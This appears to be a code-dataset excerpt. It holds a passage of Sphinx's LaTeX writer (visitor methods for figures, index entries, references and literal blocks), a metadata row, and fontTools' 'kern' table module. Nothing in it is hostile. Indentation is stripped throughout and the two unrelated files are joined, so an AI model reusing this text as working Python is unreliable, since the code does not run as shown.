# escape filepath for includegraphics, https://tex.stackexchange.com/a/202714/41112
if '#' in base:
cmd = r'{\catcode`\#=12' + cmd + '}'
self.body.append(cmd)
self.body.extend(post)
def depart_image(self, node: Element) -> None:
pass
def visit_figure(self, node: Element) -> None:
align = self.elements['figure_align']
if self.no_latex_floats:
align = "H"
if self.table:
# TODO: support align option
if 'width' in node:
length = self.latex_image_length(node['width'])
if length:
self.body.append(r'\begin{sphinxfigure-in-table}[%s]' % length + CR)
self.body.append(r'\centering' + CR)
else:
self.body.append(r'\begin{sphinxfigure-in-table}' + CR)
self.body.append(r'\centering' + CR)
if any(isinstance(child, nodes.caption) for child in node):
self.body.append(r'\capstart')
self.context.append(r'\end{sphinxfigure-in-table}\relax' + CR)
elif node.get('align', '') in ('left', 'right'):
length = None
if 'width' in node:
length = self.latex_image_length(node['width'])
elif isinstance(node[0], nodes.image) and 'width' in node[0]:
length = self.latex_image_length(node[0]['width'])
# Insert a blank line to prevent an infinite loop
# https://github.com/sphinx-doc/sphinx/issues/7059
self.body.append(BLANKLINE)
self.body.append(r'\begin{wrapfigure}{%s}{%s}' %
('r' if node['align'] == 'right' else 'l', length or '0pt') + CR)
self.body.append(r'\centering')
self.context.append(r'\end{wrapfigure}' +
BLANKLINE +
r'\mbox{}\par\vskip-\dimexpr\baselineskip+\parskip\relax' +
                                CR)  # avoid disappearance if no text follows (see issue #11079)
elif self.in_minipage:
self.body.append(CR + r'\begin{center}')
self.context.append(r'\end{center}' + CR)
else:
self.body.append(CR + r'\begin{figure}[%s]' % align + CR)
self.body.append(r'\centering' + CR)
if any(isinstance(child, nodes.caption) for child in node):
self.body.append(r'\capstart' + CR)
self.context.append(r'\end{figure}' + CR)
def depart_figure(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_caption(self, node: Element) -> None:
self.in_caption += 1
if isinstance(node.parent, captioned_literal_block):
self.body.append(r'\sphinxSetupCaptionForVerbatim{')
elif self.in_minipage and isinstance(node.parent, nodes.figure):
self.body.append(r'\captionof{figure}{')
elif self.table and node.parent.tagname == 'figure':
self.body.append(r'\sphinxfigcaption{')
else:
self.body.append(r'\caption{')
def depart_caption(self, node: Element) -> None:
self.body.append('}')
if isinstance(node.parent, nodes.figure):
labels = self.hypertarget_to(node.parent)
self.body.append(labels)
self.in_caption -= 1
def visit_legend(self, node: Element) -> None:
self.body.append(CR + r'\begin{sphinxlegend}')
def depart_legend(self, node: Element) -> None:
self.body.append(r'\end{sphinxlegend}' + CR)
def visit_admonition(self, node: Element) -> None:
self.body.append(CR + r'\begin{sphinxadmonition}{note}')
self.no_latex_floats += 1
def depart_admonition(self, node: Element) -> None:
self.body.append(r'\end{sphinxadmonition}' + CR)
self.no_latex_floats -= 1
def _visit_named_admonition(self, node: Element) -> None:
label = admonitionlabels[node.tagname]
self.body.append(CR + r'\begin{sphinxadmonition}{%s}{%s:}' %
(node.tagname, label))
self.no_latex_floats += 1
def _depart_named_admonition(self, node: Element) -> None:
self.body.append(r'\end{sphinxadmonition}' + CR)
self.no_latex_floats -= 1
visit_attention = _visit_named_admonition
depart_attention = _depart_named_admonition
visit_caution = _visit_named_admonition
depart_caution = _depart_named_admonition
visit_danger = _visit_named_admonition
depart_danger = _depart_named_admonition
visit_error = _visit_named_admonition
depart_error = _depart_named_admonition
visit_hint = _visit_named_admonition
depart_hint = _depart_named_admonition
visit_important = _visit_named_admonition
depart_important = _depart_named_admonition
visit_note = _visit_named_admonition
depart_note = _depart_named_admonition
visit_tip = _visit_named_admonition
depart_tip = _depart_named_admonition
visit_warning = _visit_named_admonition
depart_warning = _depart_named_admonition
def visit_versionmodified(self, node: Element) -> None:
pass
def depart_versionmodified(self, node: Element) -> None:
pass
def visit_target(self, node: Element) -> None:
def add_target(id: str) -> None:
# indexing uses standard LaTeX index markup, so the targets
# will be generated differently
if id.startswith('index-'):
return
# equations also need no extra blank line nor hypertarget
# TODO: fix this dependency on mathbase extension internals
if id.startswith('equation-'):
return
# insert blank line, if the target follows a paragraph node
index = node.parent.index(node)
if index > 0 and isinstance(node.parent[index - 1], nodes.paragraph):
self.body.append(CR)
# do not generate \phantomsection in \section{}
anchor = not self.in_title
self.body.append(self.hypertarget(id, anchor=anchor))
# skip if visitor for next node supports hyperlink
next_node: Node = node
while isinstance(next_node, nodes.target):
next_node = next_node.next_node(ascend=True)
domain = cast(StandardDomain, self.builder.env.get_domain('std'))
if isinstance(next_node, HYPERLINK_SUPPORT_NODES):
return
if domain.get_enumerable_node_type(next_node) and domain.get_numfig_title(next_node):
return
if 'refuri' in node:
return
if 'anonymous' in node:
return
if node.get('refid'):
prev_node = get_prev_node(node)
if isinstance(prev_node, nodes.reference) and node['refid'] == prev_node['refid']:
# a target for a hyperlink reference having alias
pass
else:
add_target(node['refid'])
# Temporary fix for https://github.com/sphinx-doc/sphinx/issues/11093
# TODO: investigate if a more elegant solution exists (see comments of #11093)
if node.get('ismod', False):
# Detect if the previous nodes are label targets. If so, remove
# the refid thereof from node['ids'] to avoid duplicated ids.
def has_dup_label(sib: Node | None) -> bool:
return isinstance(sib, nodes.target) and sib.get('refid') in node['ids']
prev = get_prev_node(node)
if has_dup_label(prev):
ids = node['ids'][:] # copy to avoid side-effects
while has_dup_label(prev):
ids.remove(prev['refid']) # type: ignore[index]
prev = get_prev_node(prev) # type: ignore[arg-type]
else:
ids = iter(node['ids']) # read-only iterator
else:
ids = iter(node['ids']) # read-only iterator
for id in ids:
add_target(id)
def depart_target(self, node: Element) -> None:
pass
def visit_attribution(self, node: Element) -> None:
self.body.append(CR + r'\begin{flushright}' + CR)
self.body.append('---')
def depart_attribution(self, node: Element) -> None:
self.body.append(CR + r'\end{flushright}' + CR)
def visit_index(self, node: Element) -> None:
def escape(value: str) -> str:
value = self.encode(value)
value = value.replace(r'\{', r'\sphinxleftcurlybrace{}')
value = value.replace(r'\}', r'\sphinxrightcurlybrace{}')
value = value.replace('"', '""')
value = value.replace('@', '"@')
value = value.replace('!', '"!')
value = value.replace('|', r'\textbar{}')
return value
def style(string: str) -> str:
match = EXTRA_RE.match(string)
if match:
return match.expand(r'\\spxentry{\1}\\spxextra{\2}')
else:
return r'\spxentry{%s}' % string
if not node.get('inline', True):
self.body.append(CR)
entries = node['entries']
for type, string, _tid, ismain, _key in entries:
m = ''
if ismain:
m = '|spxpagem'
try:
parts = tuple(map(escape, split_index_msg(type, string)))
styled = tuple(map(style, parts))
if type == 'single':
try:
p1, p2 = parts
P1, P2 = styled
self.body.append(fr'\index{{{p1}@{P1}!{p2}@{P2}{m}}}')
except ValueError:
p, = parts
P, = styled
self.body.append(fr'\index{{{p}@{P}{m}}}')
elif type == 'pair':
p1, p2 = parts
P1, P2 = styled
self.body.append(fr'\index{{{p1}@{P1}!{p2}@{P2}{m}}}'
fr'\index{{{p2}@{P2}!{p1}@{P1}{m}}}')
elif type == 'triple':
p1, p2, p3 = parts
P1, P2, P3 = styled
self.body.append(
fr'\index{{{p1}@{P1}!{p2} {p3}@{P2} {P3}{m}}}'
fr'\index{{{p2}@{P2}!{p3}, {p1}@{P3}, {P1}{m}}}'
fr'\index{{{p3}@{P3}!{p1} {p2}@{P1} {P2}{m}}}')
elif type in {'see', 'seealso'}:
p1, p2 = parts
P1, _P2 = styled
self.body.append(fr'\index{{{p1}@{P1}|see{{{p2}}}}}')
else:
logger.warning(__('unknown index entry type %s found'), type)
except ValueError as err:
logger.warning(str(err))
if not node.get('inline', True):
self.body.append(r'\ignorespaces ')
raise nodes.SkipNode
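# Worked example (added for clarity; a sketch of the behaviour of visit_index above, not
# Sphinx documentation): a plain 'single' entry such as "pipeline" is emitted as
#     \index{pipeline@\spxentry{pipeline}}
# and, when flagged as a main entry, gets "|spxpagem" appended before the closing brace.
# The escape() helper above quotes makeindex control characters first, so an entry
# containing @, ! or " reaches makeindex as "@, "! and "" respectively, and a literal |
# is rewritten to \textbar{}. A 'pair' entry emits two \index commands, one for each
# ordering of the two parts.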
def visit_raw(self, node: Element) -> None:
if not self.is_inline(node):
self.body.append(CR)
if 'latex' in node.get('format', '').split():
self.body.append(node.astext())
if not self.is_inline(node):
self.body.append(CR)
raise nodes.SkipNode
def visit_reference(self, node: Element) -> None:
if not self.in_title:
for id in node.get('ids'):
anchor = not self.in_caption
self.body += self.hypertarget(id, anchor=anchor)
if not self.is_inline(node):
self.body.append(CR)
uri = node.get('refuri', '')
if not uri and node.get('refid'):
uri = '%' + self.curfilestack[-1] + '#' + node['refid']
if self.in_title or not uri:
self.context.append('')
elif uri.startswith('#'):
# references to labels in the same document
id = self.curfilestack[-1] + ':' + uri[1:]
self.body.append(self.hyperlink(id))
self.body.append(r'\sphinxsamedocref{')
if self.config.latex_show_pagerefs and not \
self.in_production_list:
self.context.append('}}} (%s)' % self.hyperpageref(id))
else:
self.context.append('}}}')
elif uri.startswith('%'):
# references to documents or labels inside documents
hashindex = uri.find('#')
if hashindex == -1:
# reference to the document
id = uri[1:] + '::doc'
else:
# reference to a label
id = uri[1:].replace('#', ':')
self.body.append(self.hyperlink(id))
if (len(node) and
isinstance(node[0], nodes.Element) and
'std-term' in node[0].get('classes', [])):
# don't add a pageref for glossary terms
self.context.append('}}}')
# mark up as termreference
self.body.append(r'\sphinxtermref{')
else:
self.body.append(r'\sphinxcrossref{')
if self.config.latex_show_pagerefs and not self.in_production_list:
self.context.append('}}} (%s)' % self.hyperpageref(id))
else:
self.context.append('}}}')
else:
if len(node) == 1 and uri == node[0]:
if node.get('nolinkurl'):
self.body.append(r'\sphinxnolinkurl{%s}' % self.encode_uri(uri))
else:
self.body.append(r'\sphinxurl{%s}' % self.encode_uri(uri))
raise nodes.SkipNode
else:
self.body.append(r'\sphinxhref{%s}{' % self.encode_uri(uri))
self.context.append('}')
def depart_reference(self, node: Element) -> None:
self.body.append(self.context.pop())
if not self.is_inline(node):
self.body.append(CR)
def visit_number_reference(self, node: Element) -> None:
if node.get('refid'):
id = self.curfilestack[-1] + ':' + node['refid']
else:
id = node.get('refuri', '')[1:].replace('#', ':')
title = self.escape(node.get('title', '%s')).replace(r'\%s', '%s')
if r'\{name\}' in title or r'\{number\}' in title:
# new style format (cf. "Fig.%{number}")
title = title.replace(r'\{name\}', '{name}').replace(r'\{number\}', '{number}')
text = escape_abbr(title).format(name=r'\nameref{%s}' % self.idescape(id),
number=r'\ref{%s}' % self.idescape(id))
else:
# old style format (cf. "Fig.%{number}")
text = escape_abbr(title) % (r'\ref{%s}' % self.idescape(id))
hyperref = fr'\hyperref[{self.idescape(id)}]{{{text}}}'
self.body.append(hyperref)
raise nodes.SkipNode
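# Worked example (added for clarity, based only on the branches above): with a title of
# "Fig.%s" (old style) the reference text becomes "Fig.\ref{<id>}", whereas a new-style
# title such as "Fig.{number} {name}" is formatted with number=\ref{<id>} and
# name=\nameref{<id>}. Either way the result is wrapped in \hyperref[<id>]{...}, so the
# rendered number links back to the figure or table it refers to.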
def visit_download_reference(self, node: Element) -> None:
pass
def depart_download_reference(self, node: Element) -> None:
pass
def visit_pending_xref(self, node: Element) -> None:
pass
def depart_pending_xref(self, node: Element) -> None:
pass
def visit_emphasis(self, node: Element) -> None:
self.body.append(r'\sphinxstyleemphasis{')
def depart_emphasis(self, node: Element) -> None:
self.body.append('}')
def visit_literal_emphasis(self, node: Element) -> None:
self.body.append(r'\sphinxstyleliteralemphasis{\sphinxupquote{')
def depart_literal_emphasis(self, node: Element) -> None:
self.body.append('}}')
def visit_strong(self, node: Element) -> None:
self.body.append(r'\sphinxstylestrong{')
def depart_strong(self, node: Element) -> None:
self.body.append('}')
def visit_literal_strong(self, node: Element) -> None:
self.body.append(r'\sphinxstyleliteralstrong{\sphinxupquote{')
def depart_literal_strong(self, node: Element) -> None:
self.body.append('}}')
def visit_abbreviation(self, node: Element) -> None:
abbr = node.astext()
self.body.append(r'\sphinxstyleabbreviation{')
# spell out the explanation once
if node.hasattr('explanation') and abbr not in self.handled_abbrs:
self.context.append('} (%s)' % self.encode(node['explanation']))
self.handled_abbrs.add(abbr)
else:
self.context.append('}')
def depart_abbreviation(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_manpage(self, node: Element) -> None:
return self.visit_literal_emphasis(node)
def depart_manpage(self, node: Element) -> None:
return self.depart_literal_emphasis(node)
def visit_title_reference(self, node: Element) -> None:
self.body.append(r'\sphinxtitleref{')
def depart_title_reference(self, node: Element) -> None:
self.body.append('}')
def visit_thebibliography(self, node: Element) -> None:
citations = cast(Iterable[nodes.citation], node)
labels = (cast(nodes.label, citation[0]) for citation in citations)
longest_label = max((label.astext() for label in labels), key=len)
if len(longest_label) > MAX_CITATION_LABEL_LENGTH:
# adjust max width of citation labels not to break the layout
longest_label = longest_label[:MAX_CITATION_LABEL_LENGTH]
self.body.append(CR + r'\begin{sphinxthebibliography}{%s}' %
self.encode(longest_label) + CR)
def depart_thebibliography(self, node: Element) -> None:
self.body.append(r'\end{sphinxthebibliography}' + CR)
def visit_citation(self, node: Element) -> None:
label = cast(nodes.label, node[0])
self.body.append(fr'\bibitem[{self.encode(label.astext())}]'
fr'{{{node["docname"]}:{node["ids"][0]}}}')
def depart_citation(self, node: Element) -> None:
pass
def visit_citation_reference(self, node: Element) -> None:
if self.in_title:
pass
else:
self.body.append(fr'\sphinxcite{{{node["docname"]}:{node["refname"]}}}')
raise nodes.SkipNode
def depart_citation_reference(self, node: Element) -> None:
pass
def visit_literal(self, node: Element) -> None:
if self.in_title:
self.body.append(r'\sphinxstyleliteralintitle{\sphinxupquote{')
return
elif 'kbd' in node['classes']:
self.body.append(r'\sphinxkeyboard{\sphinxupquote{')
return
lang = node.get("language", None)
if 'code' not in node['classes'] or not lang:
self.body.append(r'\sphinxcode{\sphinxupquote{')
return
opts = self.config.highlight_options.get(lang, {})
hlcode = self.highlighter.highlight_block(
node.astext(), lang, opts=opts, location=node, nowrap=True)
self.body.append(r'\sphinxcode{\sphinxupquote{%' + CR
+ hlcode.rstrip() + '%' + CR
+ '}}')
raise nodes.SkipNode
def depart_literal(self, node: Element) -> None:
self.body.append('}}')
def visit_footnote_reference(self, node: Element) -> None:
raise nodes.SkipNode
def visit_footnotemark(self, node: Element) -> None:
self.body.append(r'\sphinxfootnotemark[')
def depart_footnotemark(self, node: Element) -> None:
self.body.append(']')
def visit_footnotetext(self, node: Element) -> None:
label = cast(nodes.label, node[0])
self.body.append('%' + CR)
self.body.append(r'\begin{footnotetext}[%s]' % label.astext())
self.body.append(r'\sphinxAtStartFootnote' + CR)
def depart_footnotetext(self, node: Element) -> None:
# the \ignorespaces in particular for after table header use
self.body.append('%' + CR)
self.body.append(r'\end{footnotetext}\ignorespaces ')
def visit_captioned_literal_block(self, node: Element) -> None:
pass
def depart_captioned_literal_block(self, node: Element) -> None:
pass
def visit_literal_block(self, node: Element) -> None:
if node.rawsource != node.astext():
# most probably a parsed-literal block -- don't highlight
self.in_parsed_literal += 1
self.body.append(r'\begin{sphinxalltt}' + CR)
else:
labels = self.hypertarget_to(node)
if isinstance(node.parent, captioned_literal_block):
labels += self.hypertarget_to(node.parent)
if labels and not self.in_footnote:
self.body.append(CR + r'\def\sphinxLiteralBlockLabel{' + labels + '}')
lang = node.get('language', 'default')
linenos = node.get('linenos', False)
highlight_args = node.get('highlight_args', {})
highlight_args['force'] = node.get('force', False)
opts = self.config.highlight_options.get(lang, {})
hlcode = self.highlighter.highlight_block(
node.rawsource, lang, opts=opts, linenos=linenos,
location=node, **highlight_args,
)
if self.in_footnote:
self.body.append(CR + r'\sphinxSetupCodeBlockInFootnote')
hlcode = hlcode.replace(r'\begin{Verbatim}',
r'\begin{sphinxVerbatim}')
# if in table raise verbatim flag to avoid "tabulary" environment
# and opt for sphinxVerbatimintable to handle caption & long lines
elif self.table:
self.table.has_problematic = True
self.table.has_verbatim = True
hlcode = hlcode.replace(r'\begin{Verbatim}',
r'\begin{sphinxVerbatimintable}')
else:
hlcode = hlcode.replace(r'\begin{Verbatim}',
r'\begin{sphinxVerbatim}')
# get consistent trailer
hlcode = hlcode.rstrip()[:-14] # strip \end{Verbatim}
if self.table and not self.in_footnote:
hlcode += r'\end{sphinxVerbatimintable}'
else:
hlcode += r'\end{sphinxVerbatim}'
hllines = str(highlight_args.get('hl_lines', []))[1:-1]
if hllines:
self.body.append(CR + r'\fvset{hllines={, %s,}}%%' % hllines)
self.body.append(CR + hlcode + CR)
if hllines:
self.body.append(r'\sphinxresetverbatimhllines' + CR)
raise nodes.SkipNode
def depart_literal_block(self, node: Element) -> None:
self.body.append(CR + r'\end{sphinxalltt}' + CR)
self.in_parsed_literal -= 1
visit_doctest_block = visit_literal_block
depart_doctest_block = depart_literal_block
def visit_line(self, node: Element) -> None:
self.body.append(r'\item[] ')
def depart_line(self, node: Element) -> None:
self.body.append(CR)
def visit_line_block(self, node: Element) -> None:
if isinstance(node.parent, nodes.line_block):
self.body.append(r'\item[]' + CR)
self.body.append(r'\begin{DUlineblock}{\DUlineblockindent}' + CR)
else:
self.body.append(CR + r'\begin{DUlineblock}{0em}' + CR)
if self.table:
self.table.has_problematic = True
def depart_line_block(self, node: Element) -> None:
self.body.append(r'\end{DUlineblock}' + CR)
def visit_block_quote(self, node: Element) -> None:
# If the block quote contains a single object and that object
# is a list, then generate a list not a block quote.
# This lets us indent lists.
done = 0
if len(node.children) == 1:
child = node.children[0]
if isinstance(child, (nodes.bullet_list, nodes.enumerated_list)):
done = 1
if not done:
self.body.append(r'\begin{quote}' + CR)
if self.table:
self.table.has_problematic = True
def depart_block_quote(self, node: Element) -> None:
done = 0
if len(node.children) == 1:
child = node.children[0]
if isinstance(child, (nodes.bullet_list, nodes.enumerated_list)):
done = 1
if not done:
self.body.append(r'\end{quote}' + CR)
# option node handling copied from docutils' latex writer
def visit_option(self, node: Element) -> None:
if self.context[-1]:
# this is not the first option
self.body.append(', ')
def depart_option(self, node: Element) -> None:
# flag that the first option is done.
self.context[-1] += 1
def visit_option_argument(self, node: Element) -> None:
"""The delimiter between an option and its argument."""
self.body.append(node.get('delimiter', ' '))
def depart_option_argument(self, node: Element) -> None:
pass
def visit_option_group(self, node: Element) -> None:
self.body.append(r'\item [')
# flag for first option
self.context.append(0)
def depart_option_group(self, node: Element) -> None:
self.context.pop() # the flag
self.body.append('] ')
def visit_option_list(self, node: Element) -> None:
self.body.append(r'\begin{optionlist}{3cm}' + CR)
if self.table:
self.table.has_problematic = True
def depart_option_list(self, node: Element) -> None:
self.body.append(r'\end{optionlist}' + CR)
def visit_option_list_item(self, node: Element) -> None:
pass
def depart_option_list_item(self, node: Element) -> None:
pass
def visit_option_string(self, node: Element) -> None:
ostring = node.astext()
self.body.append(self.encode(ostring))
raise nodes.SkipNode
def visit_description(self, node: Element) -> None:
self.body.append(' ')
def depart_description(self, node: Element) -> None:
pass
def visit_superscript(self, node: Element) -> None:
self.body.append(r'$^{\text{')
def depart_superscript(self, node: Element) -> None:
self.body.append('}}$')
def visit_subscript(self, node: Element) -> None:
self.body.append(r'$_{\text{')
def depart_subscript(self, node: Element) -> None:
self.body.append('}}$')
def visit_inline(self, node: Element) -> None:
classes = node.get('classes', [])
if classes in [['menuselection']]:
self.body.append(r'\sphinxmenuselection{')
self.context.append('}')
elif classes in [['guilabel']]:
self.body.append(r'\sphinxguilabel{')
self.context.append('}')
elif classes in [['accelerator']]:
self.body.append(r'\sphinxaccelerator{')
self.context.append('}')
elif classes and not self.in_title:
self.body.append(r'\DUrole{%s}{' % ','.join(classes))
self.context.append('}')
else:
self.context.append('')
def depart_inline(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_generated(self, node: Element) -> None:
pass
def depart_generated(self, node: Element) -> None:
pass
def visit_compound(self, node: Element) -> None:
pass
def depart_compound(self, node: Element) -> None:
pass
def visit_container(self, node: Element) -> None:
classes = node.get('classes', [])
for c in classes:
self.body.append('\n\\begin{sphinxuseclass}{%s}' % c)
def depart_container(self, node: Element) -> None:
classes = node.get('classes', [])
for _c in classes:
self.body.append('\n\\end{sphinxuseclass}')
def visit_decoration(self, node: Element) -> None:
pass
def depart_decoration(self, node: Element) -> None:
pass
# docutils-generated elements that we don't support
def visit_header(self, node: Element) -> None:
raise nodes.SkipNode
def visit_footer(self, node: Element) -> None:
raise nodes.SkipNode
def visit_docinfo(self, node: Element) -> None:
raise nodes.SkipNode
# text handling
def encode(self, text: str) -> str:
text = self.escape(text)
if self.literal_whitespace:
# Insert a blank before the newline, to avoid
# ! LaTeX Error: There's no line here to end.
text = text.replace(CR, r'~\\' + CR).replace(' ', '~')
return text
def encode_uri(self, text: str) -> str:
# TODO: it is probably wrong that this uses texescape.escape()
# this must be checked against hyperref package exact dealings
# mainly, %, #, {, } and \ need escaping via a \ escape
# in \href, the tilde is allowed and must be represented literally
return self.encode(text).replace(r'\textasciitilde{}', '~').\
replace(r'\sphinxhyphen{}', '-').\
replace(r'\textquotesingle{}', "'")
def visit_Text(self, node: Text) -> None:
text = self.encode(node.astext())
self.body.append(text)
def depart_Text(self, node: Text) -> None:
pass
def visit_comment(self, node: Element) -> None:
raise nodes.SkipNode
def visit_meta(self, node: Element) -> None:
# only valid for HTML
raise nodes.SkipNode
def visit_system_message(self, node: Element) -> None:
pass
def depart_system_message(self, node: Element) -> None:
self.body.append(CR)
def visit_math(self, node: Element) -> None:
if self.in_title:
self.body.append(r'\protect\(%s\protect\)' % node.astext())
else:
self.body.append(r'\(%s\)' % node.astext())
raise nodes.SkipNode
def visit_math_block(self, node: Element) -> None:
if node.get('label'):
label = f"equation:{node['docname']}:{node['label']}"
else:
label = None
if node.get('nowrap'):
if label:
self.body.append(r'\label{%s}' % label)
self.body.append(node.astext())
else:
from sphinx.util.math import wrap_displaymath
self.body.append(wrap_displaymath(node.astext(), label,
self.config.math_number_all))
raise nodes.SkipNode
def visit_math_reference(self, node: Element) -> None:
label = f"equation:{node['docname']}:{node['target']}"
eqref_format = self.config.math_eqref_format
if eqref_format:
try:
ref = r'\ref{%s}' % label
self.body.append(eqref_format.format(number=ref))
except KeyError as exc:
logger.warning(__('Invalid math_eqref_format: %r'), exc,
location=node)
self.body.append(r'\eqref{%s}' % label)
else:
self.body.append(r'\eqref{%s}' % label)
def depart_math_reference(self, node: Element) -> None:
pass
# FIXME: Workaround to avoid circular import
# refs: https://github.com/sphinx-doc/sphinx/issues/5433
from sphinx.builders.latex.nodes import ( # noqa: E402 # isort:skip
HYPERLINK_SUPPORT_NODES, captioned_literal_block, footnotetext,
)
| f2db591789c6d0851466feeddd3e11a89130f612 | 010279e2ba272d09e9d2c4e903722e5faba2cf7a | /contrib/python/fonttools/fontTools/ttLib/tables/_k_e_r_n.py | 94183c8a0a1e8a02cfc229d525030d9ae2b27ddf | ["MIT", "LicenseRef-scancode-unknown-license-reference", "OFL-1.1", "BSD-3-Clause", "Apache-2.0"] | permissive | catboost/catboost | 854c1a1f439a96f1ae6b48e16644be20aa04dba2 | f5042e35b945aded77b23470ead62d7eacefde92 | refs/heads/master | 2023-09-01T12:14:14.174108 | 2023-09-01T10:01:01 | 2023-09-01T10:22:12 | 97,556,265 | 8,012 | 1,425 | Apache-2.0 | 2023-09-11T03:32:32 | 2017-07-18T05:29:04 | Python | UTF-8 | Python | false | false | 10,436 | py | _k_e_r_n.py |
from fontTools.ttLib import getSearchRange
from fontTools.misc.textTools import safeEval, readHex
from fontTools.misc.fixedTools import fixedToFloat as fi2fl, floatToFixed as fl2fi
from . import DefaultTable
import struct
import sys
import array
import logging
log = logging.getLogger(__name__)
class table__k_e_r_n(DefaultTable.DefaultTable):
def getkern(self, format):
for subtable in self.kernTables:
if subtable.format == format:
return subtable
return None # not found
def decompile(self, data, ttFont):
version, nTables = struct.unpack(">HH", data[:4])
apple = False
if (len(data) >= 8) and (version == 1):
# AAT Apple's "new" format. Hm.
version, nTables = struct.unpack(">LL", data[:8])
self.version = fi2fl(version, 16)
data = data[8:]
apple = True
else:
self.version = version
data = data[4:]
self.kernTables = []
for i in range(nTables):
if self.version == 1.0:
# Apple
length, coverage, subtableFormat = struct.unpack(">LBB", data[:6])
else:
# in OpenType spec the "version" field refers to the common
# subtable header; the actual subtable format is stored in
# the 8-15 mask bits of "coverage" field.
# This "version" is always 0 so we ignore it here
_, length, subtableFormat, coverage = struct.unpack(">HHBB", data[:6])
if nTables == 1 and subtableFormat == 0:
# The "length" value is ignored since some fonts
# (like OpenSans and Calibri) have a subtable larger than
# its value.
(nPairs,) = struct.unpack(">H", data[6:8])
calculated_length = (nPairs * 6) + 14
if length != calculated_length:
log.warning(
"'kern' subtable longer than defined: "
"%d bytes instead of %d bytes" % (calculated_length, length)
)
length = calculated_length
if subtableFormat not in kern_classes:
subtable = KernTable_format_unkown(subtableFormat)
else:
subtable = kern_classes[subtableFormat](apple)
subtable.decompile(data[:length], ttFont)
self.kernTables.append(subtable)
data = data[length:]
def compile(self, ttFont):
if hasattr(self, "kernTables"):
nTables = len(self.kernTables)
else:
nTables = 0
if self.version == 1.0:
# AAT Apple's "new" format.
data = struct.pack(">LL", fl2fi(self.version, 16), nTables)
else:
data = struct.pack(">HH", self.version, nTables)
if hasattr(self, "kernTables"):
for subtable in self.kernTables:
data = data + subtable.compile(ttFont)
return data
def toXML(self, writer, ttFont):
writer.simpletag("version", value=self.version)
writer.newline()
for subtable in self.kernTables:
subtable.toXML(writer, ttFont)
def fromXML(self, name, attrs, content, ttFont):
if name == "version":
self.version = safeEval(attrs["value"])
return
if name != "kernsubtable":
return
if not hasattr(self, "kernTables"):
self.kernTables = []
format = safeEval(attrs["format"])
if format not in kern_classes:
subtable = KernTable_format_unkown(format)
else:
apple = self.version == 1.0
subtable = kern_classes[format](apple)
self.kernTables.append(subtable)
subtable.fromXML(name, attrs, content, ttFont)
class KernTable_format_0(object):
# 'version' is kept for backward compatibility
version = format = 0
def __init__(self, apple=False):
self.apple = apple
def decompile(self, data, ttFont):
if not self.apple:
version, length, subtableFormat, coverage = struct.unpack(">HHBB", data[:6])
if version != 0:
from fontTools.ttLib import TTLibError
raise TTLibError("unsupported kern subtable version: %d" % version)
tupleIndex = None
# Should we also assert length == len(data)?
data = data[6:]
else:
length, coverage, subtableFormat, tupleIndex = struct.unpack(
">LBBH", data[:8]
)
data = data[8:]
assert self.format == subtableFormat, "unsupported format"
self.coverage = coverage
self.tupleIndex = tupleIndex
self.kernTable = kernTable = {}
nPairs, searchRange, entrySelector, rangeShift = struct.unpack(
">HHHH", data[:8]
)
data = data[8:]
datas = array.array("H", data[: 6 * nPairs])
if sys.byteorder != "big":
datas.byteswap()
it = iter(datas)
glyphOrder = ttFont.getGlyphOrder()
for k in range(nPairs):
left, right, value = next(it), next(it), next(it)
if value >= 32768:
value -= 65536
try:
kernTable[(glyphOrder[left], glyphOrder[right])] = value
except IndexError:
# Slower, but will not throw an IndexError on an invalid
# glyph id.
kernTable[
(ttFont.getGlyphName(left), ttFont.getGlyphName(right))
] = value
if len(data) > 6 * nPairs + 4: # Ignore up to 4 bytes excess
log.warning(
"excess data in 'kern' subtable: %d bytes", len(data) - 6 * nPairs
)
def compile(self, ttFont):
nPairs = min(len(self.kernTable), 0xFFFF)
searchRange, entrySelector, rangeShift = getSearchRange(nPairs, 6)
searchRange &= 0xFFFF
entrySelector = min(entrySelector, 0xFFFF)
rangeShift = min(rangeShift, 0xFFFF)
data = struct.pack(">HHHH", nPairs, searchRange, entrySelector, rangeShift)
# yeehee! (I mean, turn names into indices)
try:
reverseOrder = ttFont.getReverseGlyphMap()
kernTable = sorted(
(reverseOrder[left], reverseOrder[right], value)
for ((left, right), value) in self.kernTable.items()
)
except KeyError:
# Slower, but will not throw KeyError on invalid glyph id.
getGlyphID = ttFont.getGlyphID
kernTable = sorted(
(getGlyphID(left), getGlyphID(right), value)
for ((left, right), value) in self.kernTable.items()
)
for left, right, value in kernTable:
data = data + struct.pack(">HHh", left, right, value)
if not self.apple:
version = 0
length = len(data) + 6
if length >= 0x10000:
log.warning(
'"kern" subtable overflow, '
"truncating length value while preserving pairs."
)
length &= 0xFFFF
header = struct.pack(">HHBB", version, length, self.format, self.coverage)
else:
if self.tupleIndex is None:
# sensible default when compiling a TTX from an old fonttools
# or when inserting a Windows-style format 0 subtable into an
# Apple version=1.0 kern table
log.warning("'tupleIndex' is None; default to 0")
self.tupleIndex = 0
length = len(data) + 8
header = struct.pack(
">LBBH", length, self.coverage, self.format, self.tupleIndex
)
return header + data
def toXML(self, writer, ttFont):
attrs = dict(coverage=self.coverage, format=self.format)
if self.apple:
if self.tupleIndex is None:
log.warning("'tupleIndex' is None; default to 0")
attrs["tupleIndex"] = 0
else:
attrs["tupleIndex"] = self.tupleIndex
writer.begintag("kernsubtable", **attrs)
writer.newline()
items = sorted(self.kernTable.items())
for (left, right), value in items:
writer.simpletag("pair", [("l", left), ("r", right), ("v", value)])
writer.newline()
writer.endtag("kernsubtable")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.coverage = safeEval(attrs["coverage"])
subtableFormat = safeEval(attrs["format"])
if self.apple:
if "tupleIndex" in attrs:
self.tupleIndex = safeEval(attrs["tupleIndex"])
else:
# previous fontTools versions didn't export tupleIndex
log.warning("Apple kern subtable is missing 'tupleIndex' attribute")
self.tupleIndex = None
else:
self.tupleIndex = None
assert subtableFormat == self.format, "unsupported format"
if not hasattr(self, "kernTable"):
self.kernTable = {}
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
self.kernTable[(attrs["l"], attrs["r"])] = safeEval(attrs["v"])
def __getitem__(self, pair):
return self.kernTable[pair]
def __setitem__(self, pair, value):
self.kernTable[pair] = value
def __delitem__(self, pair):
del self.kernTable[pair]
class KernTable_format_unkown(object):
def __init__(self, format):
self.format = format
def decompile(self, data, ttFont):
self.data = data
def compile(self, ttFont):
return self.data
